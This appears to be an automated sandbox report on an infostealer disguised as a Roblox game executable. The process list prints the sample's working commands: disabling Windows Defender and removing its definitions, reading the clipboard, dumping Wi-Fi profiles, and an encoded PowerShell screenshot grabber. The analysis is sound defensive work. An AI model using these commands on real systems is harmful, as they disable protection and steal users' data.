Malware Analysis Report

2025-05-05 21:21

Sample ID 240510-s6vj7sdc4x
Target [🚪BACKROOMS] Pet Simulator 99!.exe
SHA256 b984e378befd8a00559bb9f7d58015ea781615f47172a1c0ccfd4fad3cb2b9a2
Tags
pyinstaller execution spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

b984e378befd8a00559bb9f7d58015ea781615f47172a1c0ccfd4fad3cb2b9a2

Threat Level: Likely malicious

The file [🚪BACKROOMS] Pet Simulator 99!.exe was found to be: Likely malicious.

Malicious Activity Summary

pyinstaller execution spyware stealer

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Loads dropped DLL

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Detects Pyinstaller

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Gathers system information

Enumerates processes with tasklist

Detects videocard installed

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-10 15:44

Signatures

Detects Pyinstaller

pyinstaller
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-10 15:44

Reported

2024-05-10 15:46

Platform

win11-20240426-en

Max time kernel

18s

Max time network

22s

Command Line

"C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Detects videocard installed

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A

Enumerates processes with tasklist

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A

Gathers system information

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4312 wrote to memory of 4196 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe
PID 4312 wrote to memory of 4196 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe
PID 4196 wrote to memory of 3632 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 3632 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 4956 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 4956 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 3168 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3632 wrote to memory of 3168 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 3956 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 3956 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4196 wrote to memory of 872 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 872 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 4604 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 4604 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 872 wrote to memory of 3564 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\tasklist.exe
PID 4604 wrote to memory of 4524 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\tasklist.exe
PID 4604 wrote to memory of 4524 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\tasklist.exe
PID 872 wrote to memory of 3564 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\tasklist.exe
PID 4196 wrote to memory of 3724 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 3724 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 4584 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 4584 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 864 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 864 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 456 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 456 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 2432 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 2432 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 648 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 648 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 412 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 412 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4584 wrote to memory of 4988 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4584 wrote to memory of 4988 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 864 wrote to memory of 1540 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\tasklist.exe
PID 864 wrote to memory of 1540 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\tasklist.exe
PID 648 wrote to memory of 4636 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\systeminfo.exe
PID 648 wrote to memory of 4636 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\systeminfo.exe
PID 2432 wrote to memory of 4616 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\netsh.exe
PID 2432 wrote to memory of 4616 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\netsh.exe
PID 412 wrote to memory of 4580 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 4580 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 456 wrote to memory of 3720 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\tree.com
PID 456 wrote to memory of 3720 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\tree.com
PID 3724 wrote to memory of 3500 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 3724 wrote to memory of 3500 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe
PID 4196 wrote to memory of 3436 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 3436 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 3436 wrote to memory of 2776 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\tree.com
PID 3436 wrote to memory of 2776 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\tree.com
PID 4196 wrote to memory of 2424 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 2424 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 2424 wrote to memory of 2156 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\tree.com
PID 2424 wrote to memory of 2156 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\tree.com
PID 4196 wrote to memory of 4288 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 4288 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4580 wrote to memory of 2680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4580 wrote to memory of 2680 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4288 wrote to memory of 2640 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\tree.com
PID 4288 wrote to memory of 2640 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\tree.com
PID 4196 wrote to memory of 1548 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 4196 wrote to memory of 1548 | N/A | C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe | C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 1864 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\tree.com
PID 1548 wrote to memory of 1864 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\tree.com

Processes

C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe

"C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe"

C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe

"C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\[🚪BACKROOMS] Pet Simulator 99!.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\tree.com

